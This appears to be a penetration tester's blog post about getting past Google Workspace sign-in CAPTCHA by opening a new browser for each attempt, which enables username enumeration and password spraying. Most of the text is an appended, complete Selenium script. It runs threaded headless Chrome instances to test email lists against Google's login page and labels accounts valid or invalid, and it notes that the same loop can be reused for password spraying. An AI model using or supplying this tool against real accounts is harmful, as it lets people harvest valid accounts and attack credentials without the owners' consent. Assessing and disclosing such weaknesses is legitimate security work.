While performing a recent assessment of an organization using GSuite, I discovered that the implementation of CAPTCHA to stop automated activity is wholly inadequate, and I was able to accomplish both username enumeration and password spraying with relative ease.
Classic Username Enumeration
I quickly discovered while interacting with this that the best way to bypass the CAPTCHA is to just ignore it altogether.
So How to Beat the CAPTCHAs?
No complex machine learning to solve CAPTCHA puzzles. No rotating IP addresses through proxies. It was as easy as programmatically closing the browser between each task and opening a new one. In each case, a fresh browser could supply at least an initial username without being prompted to solve a puzzle: whatever counter triggers the CAPTCHA resets with the browser session and is not tied to the source IP. So to do this ad infinitum, you simply have to automate the process of opening and closing the browser between each attempt. Fortunately, with Selenium, this is extremely easy to do.
A script built on this approach opens a new browser instance for each email in the list and tests whether the username is valid; after running, you have a list of which emails are valid and which are not. Obviously, this is just a POC and doesn't scale well if you are going to test thousands of email addresses. That could be resolved through multi-threading and configuring the browsers to be headless.
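The pattern above, as an added example rather than the post's own script: the orchestration (start a fresh browser, make one attempt, quit the browser, repeat, optionally across a thread pool of headless instances) is kept separate from the page interaction so it can be exercised without a real browser. The Selenium pieces assume Chrome with chromedriver installed, and the login-page selectors (`identifierId`, `identifierNext`, `Passwd`) and the "password prompt appeared means the account exists" heuristic are assumptions not stated in the post; verify them against the live page. The same loop serves a password-spray probe, since only the `probe` callback changes.

```python
"""Fresh-browser-per-attempt enumeration. Added example; not the original post's code."""
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, Iterable, Optional

try:  # Selenium is only needed for a real run; the orchestration imports without it
    from selenium import webdriver
    from selenium.webdriver.common.by import By
    from selenium.webdriver.support.ui import WebDriverWait
except ImportError:
    webdriver = None

LOGIN_URL = "https://accounts.google.com/"  # assumption: sign-in entry point


def make_headless_chrome():
    """Start a brand-new headless Chrome with an empty profile: no cookies, no CAPTCHA state."""
    opts = webdriver.ChromeOptions()
    opts.add_argument("--headless=new")
    opts.add_argument("--incognito")
    return webdriver.Chrome(options=opts)


def probe_google_login(driver, email: str) -> bool:
    """Submit one identifier and report whether the account appears to exist.

    Assumed DOM (not from the post): identifier box id 'identifierId', Next button
    id 'identifierNext', and a valid account advances to a field named 'Passwd'.
    """
    driver.get(LOGIN_URL)
    driver.find_element(By.ID, "identifierId").send_keys(email)
    driver.find_element(By.ID, "identifierNext").click()
    try:
        # a non-empty element list is truthy, so this waits for the password field
        WebDriverWait(driver, 5).until(lambda d: d.find_elements(By.NAME, "Passwd"))
        return True
    except Exception:
        return False  # no password prompt within the wait: treat as unknown user


def enumerate_usernames(
    emails: Iterable[str],
    make_driver: Callable[[], object],
    probe: Callable[[object, str], bool],
    workers: int = 1,
) -> Dict[str, Optional[bool]]:
    """One browser per attempt. True/False is the probe's verdict; None means the attempt errored."""

    def one_attempt(email: str) -> Optional[bool]:
        driver = make_driver()      # new instance: the CAPTCHA trigger starts from zero
        try:
            return probe(driver, email)
        except Exception:
            return None             # a broken attempt must not abort the whole run
        finally:
            driver.quit()           # always tear the browser down before the next try

    emails = list(emails)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(zip(emails, pool.map(one_attempt, emails)))


if __name__ == "__main__":
    import sys

    targets = [line.strip() for line in sys.stdin if line.strip()]  # one email per line
    verdicts = enumerate_usernames(targets, make_headless_chrome, probe_google_login, workers=4)
    for email, ok in verdicts.items():
        label = "VALID  " if ok else ("invalid" if ok is False else "error  ")
        print(f"{label} {email}")
```

Run it as `python3 enum.py < emails.txt`; `workers` controls how many headless browsers run at once, and every attempt still gets its own process, which is what keeps the CAPTCHA from ever being shown.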